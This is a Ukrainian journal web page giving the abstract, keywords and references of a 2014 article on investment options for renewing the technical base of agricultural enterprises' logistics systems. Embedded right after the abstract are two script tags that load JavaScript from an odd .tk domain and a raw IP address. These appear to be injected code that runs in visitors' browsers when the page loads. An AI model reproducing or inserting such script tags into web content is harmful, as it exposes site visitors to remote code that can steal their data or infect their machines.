ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 658.15(075.8)
Аграрний менеджмент і підприємництво

Розвиток форм інвестування оновлення техніко-технологічної бази логістичних систем / Сумець О. М. // Економіка АПК. - 2014. - № 2 - С. 57

Обґрунтовано необхідність оновлення техніко-технологічної бази підприємств аграрного сектору. Наведено визначення дефініції «техніко-технологічна база» логістичної системи сільськогосподарського підприємства, виконано критичний аналіз підходів до вибору ефективного варіанта залучення грошових надходжень для оновлення техніко-технологічної бази логістичних систем підприємств. Обґрунтовано використання для вибору варіанта фінансування результатного і витратного критеріїв. Запропоновано методику вибору ефективного варіанта залучення коштів для оновлення техніко-технологічної бази логістичних систем підприємств. Ефективність використання запропонованої методики показана на умовному прикладі. Методика може бути використана для розробки заходів щодо економії грошових надходжень при здійсненні господарської діяльності підприємствами аграрного сектору, коригуванні стратегії їхнього розвитку. Рис.: 3. Бібліогр.: 12.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: підприємство, логістична система, техніко-технологічна база, оновлення, грошові надходження, економічний ефект

Список використаних джерел

 1. Непочатенко А.В. Кореляційно-регресивний аналіз зміни кількості техніки у сільськогосподарських підприємствах України за період 2000-2010 рр. / А.В. Непочатенко, В.А. Непочатенко // Зб. наук. праць «Економіка та управління АПК». –Вип. 7(93). – Біла Церква: Білоцерків. нац. аграр. ун-т, 2012. –С.98-101.
 2. Пелихов Е.Ф. Оценка экономической эффективности логистических решений / Е.Ф. Пелихов // Логистика: проблемы и решения. –2005. –№ 1. –С. 90-97.
 3. Пелихов Е.Ф. Экономическая эффективность инноваций : [моногр.] / Е.Ф. Пелихов. –Х.: Изд-во НУА, 2005. –172 с.
 4. Пелихов Е.Ф. Экономическое обоснование выбора альтернативных вариантов новой техники и форм инвестирования при обновлении технико-технологической базы логистических систем / Е.Ф. Пелихов, А.М. Сумец // Логистика: проблемы и решения. –2007. –№ 2. –С. 32-46.
 5. Перевозка экспортно-импортных грузов. Организация логистических систем. –2-е изд., доп. и перераб.; под ред. А.В. Кириченко. –СПб.: Питер, 2004. – 506 с.
 6. Сумец А.М. Экономическое обоснование выбора альтернативных вариантов новой техники / А.М. Сумец // Вісн. Донецького інституту автодорожнього транспорту. – 2007. – № 1-2. – С.51-56.
 7. Сумец А.М. Логистика: теория, ситуации, практические задания / А.М. Сумец. –К.: «Хай-Тек Пресс», 2008. –320 с.
 8. Шмален Г. Основы и проблемы экономики предприятия / Г. Шмален. –М. : Финансы и статистика, 1996. –512 с.
 9. Birman G. The economic analysis of investment projects / G. Birman, S. Schmidt. – Nev York : Elsevier Science, 1994. – 620 p.
 10. Northcott D. Adoption of decisions invnstitsionnyh / D. Northcott. – Nev York : W.W. Norton, 1990. – 342 p.
 11. Solnik B. International Investments / Bruno Solnik. –Reading, MA : Addisson-Wesley, 1991. – 402 p.
 12. Sharpe W.F. Invetments / W.F. Sharpe, G.J. Alexander, J.V. Bailey. –New Jersey : Hrentice Hall International, Inc., 1995. – 1024 c.
Читати статтю: 14_02_57-63.pdf
Читати переклад статті: 1402sumets.pdf